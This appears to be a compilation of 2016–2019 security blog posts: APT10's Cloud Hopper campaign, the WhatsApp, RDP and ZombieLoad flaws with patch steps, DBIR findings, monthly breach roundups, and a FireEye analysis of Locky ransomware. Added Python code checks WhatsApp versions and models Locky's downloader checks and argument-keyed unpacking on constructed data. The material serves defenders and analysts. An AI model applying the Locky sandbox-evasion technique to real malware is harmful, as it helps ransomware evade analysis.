An interesting article by Reuters revealed eight of the world’s biggest technology service providers were successfully hacked by APT10, aka 'StonePanda'. APT10, linked to Chinese hackers, operated a sustained campaign over a number of years dubbed “Cloud Hopper”, which Reuters revealed affected Hewlett Packard Enterprise (HPE), IBM, Fujitsu, Tata Consultancy Services, NTT Data, Dimension Data, Computer Sciences Corporation, and DXC Technology. The APT10 attackers searched for access points into networks and IT systems and, when found, extracted confidential information and potential trade secrets. These reported hacks may well be the tip of the iceberg. The Register stated that, having gained access to the major service providers, the APT10 group may have gained access to many of their customers. Those customers run into the millions, “dramatically increasing the pool of valuable industrial and aerospace data stolen.”


WhatsApp, Microsoft and Intel Chip Vulnerabilities

Quickly applying software updates (patching) to mitigate security vulnerabilities is a cornerstone of both a home and business security strategy. So it was interesting to see how the mainstream news media reported the disclosure of three separate ‘major’ security vulnerabilities this week, within WhatsApp, Microsoft Windows and Intel Processors.

WhatsApp

The WhatsApp security flaw by far received the most attention from the media and was very much the leading front-page news story for a day. The WhatsApp vulnerability (CVE-2019-3568) impacts both the iPhone and Android versions of the mobile messaging app, allowing an attacker to install surveillance software, namely spyware called Pegasus, which can access the smartphone's call logs and text messages, and can covertly enable and record the camera and microphone.

From a technical perspective, the vulnerability (CVE-2019-3568) is a buffer overflow in WhatsApp's VOIP stack: sending specially crafted SRTCP packets to the phone makes remote code execution possible, a sophisticated exploit.

Should you be concerned?

WhatsApp said it believed only a "select number of users were targeted through this vulnerability by an advanced cyber actor." According to the FT, that threat actor was an Israeli company called ‘NSO Group’. NSO developed the exploit to sell on; NSO advertises that it sells products to government agencies "for fighting terrorism and aiding law enforcement investigations". NSO products (aka "spyware") are known to be used by government agencies in the UAE, Saudi Arabia and Mexico.

So, if you are one of the 1.5 billion WhatsApp users and not a Middle East political activist or a Mexican criminal, you probably shouldn’t worry too much about your smartphone having been exploited in the past. If you were exploited, there would be signs, with unusual glitches and activity on your phone. Despite the low risk at present, all WhatsApp users should quickly update their WhatsApp app before criminals attempt to ‘copycat’ NSO Group's exploitation.

How to Prevent 

Update the WhatsApp app.
iOS

  • Open the Apple AppStore App
  • Search for WhatsApp Messenger
  • Tap 'Update' and the latest version of WhatsApp will be installed
  • App Version 2.19.51 and above fixes the vulnerability
Android
  • Open Google Play Store
  • Tap the menu in the top left corner
  • Go to “My Apps & Games”
  • Tap ‘Update’ next to WhatsApp Messenger and the latest version of WhatsApp will be installed
  • App Version 2.19.134 and above fixes the vulnerability
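
As an added practical check (not part of the original post), the following Python compares an inventory of installed WhatsApp versions against the fixed versions given above (iOS 2.19.51, Android 2.19.134). The inventory rows are constructed sample data; in practice they would come from an MDM export. It also shows the classic mistake of comparing version strings as text, which would rank 2.19.134 below 2.19.51:

```python
"""Flag WhatsApp installs still below the fixed versions for CVE-2019-3568.

Added example, not from the original post. FIXED_VERSION comes from the
post; INVENTORY is constructed sample data standing in for an MDM export.
"""
from typing import List, Tuple

# Fixed versions stated in the post, per platform.
FIXED_VERSION = {
    "ios": (2, 19, 51),
    "android": (2, 19, 134),
}


def parse_version(version: str) -> Tuple[int, ...]:
    """Turn '2.19.134' into (2, 19, 134) so each field compares numerically."""
    return tuple(int(part) for part in version.strip().split("."))


def is_patched(platform: str, version: str) -> bool:
    """True when the installed version is at or above the fix for that platform."""
    return parse_version(version) >= FIXED_VERSION[platform.lower()]


def string_compare_is_wrong(a: str, b: str) -> bool:
    """Demonstrates the pitfall: as text '2.19.134' < '2.19.51' because the
    character '1' sorts before '5', yet numerically 134 > 51."""
    return (a < b) != (parse_version(a) < parse_version(b))


# Constructed inventory: (device id, platform, installed WhatsApp version)
INVENTORY = [
    ("phone-01", "ios", "2.19.51"),
    ("phone-02", "ios", "2.19.50"),
    ("phone-03", "android", "2.19.134"),
    ("phone-04", "android", "2.19.98"),
    ("phone-05", "android", "2.20.1"),
]


def unpatched_devices(inventory=INVENTORY) -> List[str]:
    """Device ids whose WhatsApp version is below the fixed version."""
    return [dev for dev, plat, ver in inventory if not is_patched(plat, ver)]


if __name__ == "__main__":
    for dev in unpatched_devices():
        print(f"{dev}: WhatsApp below fixed version, update required")
    print("naive string compare gets 2.19.134 vs 2.19.51 wrong:",
          string_compare_is_wrong("2.19.134", "2.19.51"))
```

Only phone-02 and phone-04 are reported; the tuple comparison is what makes 2.20.1 correctly count as newer than 2.19.134.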
Microsoft Worm Vulnerability CVE-2019-0708
Making fewer media headlines was the announcement of a new “wormable” vulnerability discovered within several versions of Microsoft’s Windows operating system. The vulnerability, CVE-2019-0708, is within the Windows “Remote Desktop Services” component.

This vulnerability is by far the most dangerous vulnerability reported this week, probably this year; it is a similar flaw to the one the WannaCry malware exploited en masse in May 2017. WannaCry was a ransomware worm which severely impacted the operation of several large organisations, including the NHS. It exploited a similar Microsoft Windows vulnerability which enabled the malware to quickly self-propagate (worm) across networks, infecting vulnerable systems en masse with ransomware and rendering such systems unusable.


Such is the concern about a second WannaCry-style attack due to this flaw that Microsoft has taken the rare step of releasing security patches for unsupported versions of the Windows operating system, such as Windows XP and Windows Server 2003.

How to Prevent
Apply the latest Microsoft Windows Update. Microsoft has said anti-virus products will not provide any protection against the exploitation of this vulnerability, therefore applying the Microsoft May 2019 Security Update, released on Tuesday 14th May 2019, is the only way to be certain of protecting against the exploitation of this critical vulnerability. Where a system genuinely cannot be patched straight away, Microsoft's advisory for CVE-2019-0708 also lists interim mitigations: enable Network Level Authentication (NLA) on Remote Desktop Services, so an attacker needs valid credentials before the vulnerable code is reachable, block inbound TCP port 3389 at the perimeter firewall, and disable Remote Desktop Services where they are not required.

Ensure automatic updates are always kept switched on. Windows by default should attempt to download and install the latest security updates; typically you will be prompted to apply the update and accept a reboot. Do this without delay.

To double check, select the Start menu, followed by the gear cog icon on the left. Then, select Update & Security and Windows Update.

Businesses must also seek to apply Microsoft security updates as soon as they are released. Typically large organisations control the release of Microsoft security patches centrally, they should monitor and risk assess the importance of newly released security updates, and then apply across their IT estate at a rate based on risk.

Intel CPU ZombieLoad Vulnerability
There was little mainstream coverage of a third major security vulnerability reported this week. Dubbed 'ZombieLoad', this side-channel processor vulnerability is present in almost every Intel processor made since 2011. This hardware vulnerability is a particular concern to businesses which use or provide cloud services, since it can leak data between workloads sharing the same physical CPU core, which is exactly the multi-tenant situation cloud hosting creates. This flaw can also be mitigated by patching, with Microsoft, Apple, Amazon and Google all releasing security patches. For further information about the Intel CPU vulnerability, read the following posts.

2019 Verizon Data Breach Investigations Report (DBIR) Key Takeaways

The 2019 Verizon Data Breach Investigations Report (DBIR) was released today, and I was lucky enough to be handed a hot off the press physical copy while at the Global Cyber Alliance Cyber Trends 2019 event at Mansion House, London. For me, the DBIR provides the most insightful view on the evolving threat landscape, and is the most valuable annual “state of the nation” report in the security industry.

Global Cyber Alliance Cyber Trends 2019

The DBIR has evolved since its initial release in 2008, when it was focused on payment card data breaches and Verizon's own breach investigation data. This year’s DBIR involved the analysis of 41,686 security incidents from 66 global data sources in addition to Verizon. The analysed findings are expertly presented over 77 pages, using simple charts supported by astute ‘plain English’ explanations, which is why the DBIR is one of the most quoted reports in presentations and within industry sales collateral.

DBIR 2019 Key Takeaways
      • Financial gain remains the most common motive behind data breaches (71%)
      • 43% of breaches occurred at small businesses
      • A third (32%) of breaches involved phishing
      • The nation-state threat is increasing, with 23% of breaches by nation-state actors
      • More than half (56%) of data breaches took months or longer to discover
      • Ransomware remains a major threat, and is the second most common type of malware reported
      • Business executives are increasingly targeted with social engineering attacks such as phishing/BEC
      • Crypto-mining malware accounts for less than 5% of data breaches; despite the publicity, it didn’t make the top ten malware listed in the report
      • Espionage is a key motivation behind a quarter of data breaches
      • 60 million records breached due to misconfigured cloud service buckets
      • Continued reduction in payment card point-of-sale breaches
      • The hacktivist threat remains low; the increase in hacktivist attacks reported in the 2012 DBIR appears to have been a one-off spike

Cyber Security Roundup for April 2019

The UK government controversially gave a green light to Huawei to get involved in the building of the UK's 5G networks, although the Chinese tech giant's role will be limited to non-sensitive areas of the network, such as providing antennas. This decision by Theresa May came days after US intelligence announced Huawei was Chinese state funded, and amidst reports of historical backdoors in Huawei products, stoking up the Huawei political and security row even further this month; it has also resulted in the UK Defence Secretary, Gavin Williamson, being sacked. 
The National Cyber Security Centre (NCSC) launched a free online tool called "Exercise in a Box", designed by the UK cyber intelligence boffins to help organisations prepare for managing major cyber attacks. The premise is that the tool will help UK organisations avoid scenarios such as 2017’s WannaCry attacks, which devastated NHS IT systems and placed patient lives at risk.
 
German drug manufacturing giant Bayer found a malware infection, said to originate from a Chinese group called "Wicked Panda". The malware in question was Winnti, which is well known in the security industry and allows remote access into networks, allowing hackers to deliver further malware and to conduct exploits. In my view, the presence of Winnti is a sure sign of a covert and sustained campaign by a sophisticated threat actor, likely focused on espionage given the company's sector. Bayer stressed there was no evidence of data theft, but is still investigating. 
 
Another manufacturing giant severely hit by a cyber attack this month was Aebi Schmidt. A ransomware outbreak impacted its business' operations globally, with most of the damage occurring at their European base. The ransomware wasn't named, but it left multiple Windows systems, on their presumably flat network infrastructure, paralyzed.
 
Facebook may have announced the dawn of their "privacy evolution" at the end of April, but their privacy woes still continue, after UpGuard researchers found and reported 540 million Facebook member records on an unsecured AWS S3 bucket. The "Cultura Colectiva" dataset contained 146GB of data with 540 million records showing comments, likes, reactions, account names, Facebook IDs and more. Looks like Facebook really have their work cut out restoring consumers' faith in their ability to protect privacy.
 
UK businesses saw a significant increase in cyber attacks in 2019 according to a report by insurer Hiscox, with 55% of respondents reporting they had faced a cyber attack in 2019, up from 40% the previous year.
 
A survey by the NCSC concluded most UK users are still using weak passwords. Released just before the CyberUK 2019 conference in Glasgow, which I was unable to attend due to work commitments, it said the most common password on breached accounts was "123456", used by 23.2 million accounts worldwide. Next on the list were "123456789", "qwerty", "password" and "1111111". Liverpool was the most common Premier League football team used as a password, with Blink 182 the most common music act. The NCSC also published a separate analysis of the 100,000 most commonly re-occurring passwords that have been accessed by third parties in global cyber breaches. So passwords still remain the biggest Achilles' heel in our security.

The UK hacktivist threat came back to the fore this month, after the Anonymous group took revenge on the UK government for arresting WikiLeaks founder Julian Assange by attacking Yorkshire councils. I am not sure what Yorkshire's link with Assange actually is, but the website for Barnsley Council was taken down by a DDoS attack; a tweet from the group CyberGhost404 linked to the crashed Barnsley Council website and said "Free Assange or chaos is coming for you!". A tweet from an account called 'Anonymous Espana', with an image, suggested they had access to Bedale Council's confidential files, and were threatening to leak them. 
 
Microsoft Outlook.com, Hotmail and MSN users are reported as having their accounts compromised. TechCrunch revealed the breach was caused due to the hackers getting hold of a customer support tech's login credentials. Over two million WiFi passwords were found exposed on an open database by the developer of WiFi Finder. The WiFi Finder App helps to find and log into hotspots.  Two in every three hotel websites leak guest booking details and personal data according to a report. Over 1,500 hotels in 54 countries failed to protect user information.
 
Finally, but not least, a great report by Recorded Future on the rise of the dark web business of credential stuffing, titled "The Economy of Credential Stuffing Attacks". The report explains how low-level criminals use automated 'checker' tools to validate compromised credentials before selling them on.

I am aware of school children getting sucked into this illicit world. It typically starts with them seeking to take over better online game accounts after their own account is compromised, and they quickly end up with more money than they can spend. Aside from keeping an eye on what your children are up to online as a parent, it goes to underline the importance of using unique complex passwords with every web account (use a password manager or vault to help you; see the password security section on the Security Expert website). And always use Multi-Factor Authentication where available, and if you suspect or are informed that your account 'may' have been compromised, change your password straight away.


Cyber Security Roundup for March 2019

The potential threat posed by Huawei to the UK national infrastructure continues to be played out. GCHQ called for a ban on Huawei technology within UK critical networks, such as 5G networks, while Three said a Huawei ban would delay the UK 5G rollout, and the EU ignored the US calls to ban Huawei in 5G rollouts, while promoting the EU Cybersecurity certification scheme to counter the Chinese IT threat, which is all rather confusing.  Meanwhile, Microsoft Researchers found an NSA-style Backdoor in Huawei Laptops, which was reported to Huawei by Microsoft, leading to the flaw being patched in January 2019.
A serious security flaw placed Royal Bank of Scotland (RBS) customers at risk. The vulnerability was discovered by PenTest Partners in the bank-provided 'Heimdal Thor' security software, which was meant to protect NatWest customers from cyber attacks but actually permitted remote command injection on the customer's endpoint. PenTest Partners said: "We were able to gain access to a victim's computer very easily. Attackers could have had complete control of that person's emails, internet history and bank details. To do this we had to intercept the user's internet traffic but that is quite simple to do when you consider the unsecured public wi-fi out there, and it's often all too easy to compromise home wi-fi setups."
 
Facebook made negative security headlines yet again after they disclosed that 20,000 of their employees had had access to hundreds of millions of user account passwords for years.

One of the world’s biggest aluminium producers, Norsk Hydro, suffered production outages after a ransomware outbreak impacted its European and US operations. Damages from the ransomware attack on Norsk Hydro reached as high as $40M.

Citrix disclosed that a security breach of its internal network may have compromised 6TB of sensitive data. The FBI had told Citrix that international cyber criminals had likely gained access to its internal network. Citrix said in a statement it had taken action to contain the breach: “We commenced a forensic investigation; engaged a leading cyber security firm to assist; took actions to secure our internal network; and continue to cooperate with the FBI”. According to security firm Resecurity, the attacks were perpetrated by an Iranian-linked group known as IRIDIUM.

Credit monitoring firm Equifax admitted in a report that it didn't follow its own patching schedule, neglecting to patch Apache Struts, which led to the major 2017 breach that impacted 145 million people. The report also said Equifax delayed alerting its customers for six weeks after detecting the breach.

ASUS computers had a backdoor pushed to them through the company's own software update system, in an attack dubbed “ShadowHammer”. Kaspersky researchers estimated the malware was distributed to nearly a million people, although the attackers appeared to have targeted only 600 specific devices. ASUS patched the issue, but questions still remain.


The top 10 biggest breaches of 2018 according to 4iQ were:
  1. Anti-Public Combo Collections – (Hacked) Sanixer Collection #1-6, 1.8 billion unique email addresses.
  2. Aadhaar, India – (Open third party device) 1.1 billion people affected
  3. Marriott Starwood Hotels – (Hacked) 500 million guests' PII
  4. Exactis – (Open device) 340 million people and businesses.
  5. HuaZhu Group – (Accidental Exposure) 240 million records
  6. Apollo – (Open device) 150 million app users.
  7. Quora – (Hacked) 100 million users.
  8. Google+ – (API Glitch) 52.2 million users.
  9. Chegg – (Hacked) 40 million accounts 
  10. Cathay Pacific Airways (Targeted attack) 9.4 million passengers.
Barracuda Networks reported the top 12 phishing email subject lines, after they analysed 360,000 phishing emails over a three-month period.

Locky is Back Asking for Unpaid Debts

On June 21, 2016, FireEye’s Dynamic Threat Intelligence (DTI) identified an increase in JavaScript contained within spam emails. FireEye analysts determined the increase was the result of a new Locky ransomware spam campaign.

As shown in Figure 1, Locky spam activity was uninterrupted until June 1, 2016, when it stopped for nearly three weeks. During this period, Locky was the most dominant ransomware distributed in spam email. Now, Locky distribution has returned to the level seen during the first half of 2016.

Figure 1. Locky spam activity in 2016

Figure 2 shows that the majority of Locky spam email detections between June 21 and June 23 of this year were recorded in Japan, the United States and South Korea.

Figure 2. Locky spam by country from June 21 to June 23 of this year

The spam email – a sample is shown in Figure 3 – purports to contain an unpaid invoice in an attached ZIP archive. Instead of an invoice, the ZIP archive contains a Locky downloader written in JavaScript.

Figure 3. Locky spam email

JavaScript based Downloader Updates

In this campaign, a few updates were seen in both the JavaScript-based downloader and the Locky payload.

The JavaScript downloader does the following:

  1. Iterates over an array of URLs hosting the Locky payload.
  2. If a connection to one of the URLs fails, the JavaScript sleeps for 1,000 ms before continuing to iterate over the array of URLs.
  3. Uses a custom XOR-based decryption routine to decrypt the Locky payload.
  4. Ensures the decrypted binary is of a predefined size. In Figure 4 below, the size of the decrypted binary had to be greater than 143,360 bytes and smaller than 153,660 bytes to be executed.

Figure 4. Payload download function in JavaScript

  5. Checks (Figure 5) that the first two bytes of the binary contain the “MZ” header signature.

Figure 5: MZ header check

  6. Executes the decrypted payload by passing it the command line parameter, “123”.

Locky Payload Updates

The Locky ransomware downloaded in this campaign requires a command line argument to properly execute. This command line parameter, “123” in the analyzed sample, is passed to the binary by the first stage JavaScript-based downloader. This command line parameter value is used in the code unpacking stage of the ransomware. Legitimate binaries typically verify the number of arguments passed or compare the command line parameter with the expected value and gracefully exit if the check fails. However, in the case of this Locky ransomware, the program does not exit (Figure 6) and the value received as a command line parameter is added to a constant value defined in the binary. The sum of the constant and the parameter value is used in the decryption routine (Figure 7). If no command line parameter is passed, it adds zero to the constant.

Figure 6. Command line parameter check

Figure 7. Decryption routine

If no command line parameter is passed, then the constant for the decryption routine is incorrect. This results in a program crash, as the decrypted code is invalid. In Figure 8 and Figure 9, we can see the decrypted code sections with and without the command line parameter, respectively.

Figure 8. Correct decrypted code

Figure 9. Incorrect decrypted code

By using this technique, Locky authors have created a dependency on the first stage downloader for the second stage to be executed properly. If a second stage payload such as this is directly analyzed, it will result in a crash.
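
To make the two dependencies concrete, here is an added example in Python (not FireEye's code and not Locky's; the repeating-key XOR, the unpack constant, the code marker and the fixture payloads are all constructed here for illustration). It reproduces the stage-one sanity checks from the write-up (decrypted size strictly between 143,360 and 153,660 bytes, “MZ” at offset 0) and the stage-two key derivation (constant plus the numeric command-line parameter, zero when it is missing), and shows why running the second stage without “123” yields garbage:

```python
"""Locky stage-one / stage-two checks, re-implemented as a constructed example.

Not FireEye's or Locky's code. The repeating-key XOR, UNPACK_CONSTANT, the
code marker and the fixture bytes are assumptions made for illustration;
the size bounds, the MZ check and the 'constant + parameter' key derivation
follow the write-up.
"""
from typing import Optional, Tuple

# Stage one: bounds the downloader enforces on the decrypted payload (Figure 4).
MIN_SIZE = 143_360
MAX_SIZE = 153_660


def xor_transform(data: bytes, key: bytes) -> bytes:
    """Repeating-key XOR (assumed scheme; the real routine is 'custom').
    XOR is its own inverse, so the same call encrypts and decrypts."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def stage1_accepts(decrypted: bytes) -> bool:
    """The downloader's checks before it executes the payload: size strictly
    within (MIN_SIZE, MAX_SIZE) and an 'MZ' header (Figure 5)."""
    if not (MIN_SIZE < len(decrypted) < MAX_SIZE):
        return False
    return decrypted[:2] == b"MZ"


# Stage two: the payload's unpacking key depends on the command-line argument.
UNPACK_CONSTANT = 0x7A           # constructed; the real constant lives in the binary
CODE_MARKER = b"\x55\x8b\xec"    # push ebp; mov ebp, esp: stand-in for "valid code"


def derive_unpack_key(cmdline_param: Optional[str]) -> int:
    """Constant + parameter. The binary does not bail out when the parameter
    is missing; it simply adds zero (Figure 6), so the key comes out wrong."""
    param = int(cmdline_param) if cmdline_param is not None else 0
    return (UNPACK_CONSTANT + param) & 0xFF


def unpack_stage2(packed: bytes, cmdline_param: Optional[str]) -> bytes:
    """Single-byte XOR unpack with the derived key (Figure 7)."""
    key = derive_unpack_key(cmdline_param)
    return bytes(b ^ key for b in packed)


def looks_like_code(unpacked: bytes) -> bool:
    """Did unpacking yield the expected prologue? With the wrong key the bytes
    are garbage, which is what crashes the real sample (Figure 9)."""
    return unpacked.startswith(CODE_MARKER)


def build_fixtures() -> Tuple[bytes, bytes, bytes]:
    """Constructed inputs: an encrypted 150,000-byte fake PE for stage one,
    its key, and a stage-two section packed with parameter '123'."""
    stage1_key = b"\x13\x37"
    fake_pe = b"MZ" + b"\x90" * (150_000 - 2)
    encrypted = xor_transform(fake_pe, stage1_key)
    code = CODE_MARKER + b"\xcc" * 29
    packed = unpack_stage2(code, "123")   # packing == unpacking for XOR
    return encrypted, stage1_key, packed


if __name__ == "__main__":
    enc, key, packed = build_fixtures()
    print("stage1 accepts with right key :", stage1_accepts(xor_transform(enc, key)))
    print("stage1 accepts with wrong key :", stage1_accepts(xor_transform(enc, b"\x00\x00")))
    print("stage2 valid with '123'       :", looks_like_code(unpack_stage2(packed, "123")))
    print("stage2 valid without argument :", looks_like_code(unpack_stage2(packed, None)))
```

Run stand-alone it prints True, False, True, False: the same stage-two bytes unpack correctly only when the downloader-supplied “123” is present, which is why a sandbox or analyst that executes the dropped binary on its own sees a crash rather than ransomware behaviour. The practical consequence for analysis is to recover the argument from the first stage and pass it when detonating or debugging the second.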

Conclusion

As of today, the Locky spam campaign is still ongoing, with an added anti-analysis / sandbox evasion technique. We expect to see additional Locky spam campaigns and will remain vigilant in order to protect our customers.

Email Hashes

2cdf62f8aae20026418f143895c769a2009e6b9b3ac59bfa8fc79ca2f326b93a

1fd5c1f0ecc1d54324f3bdc327e7893032482a13c0914ef6f531bd93caef0a06

0ea7d59d7f1494fce8f45a1f35abb07a456de6d8d65327eca8ff84f307a49a06

22645be8553628574a7af3c32a45178e201e9af33b20b36d29b9c012b731da4c

198d8d1a89221c575d957c1f4342741f3675ebb10f95ffe3371150e124f4850e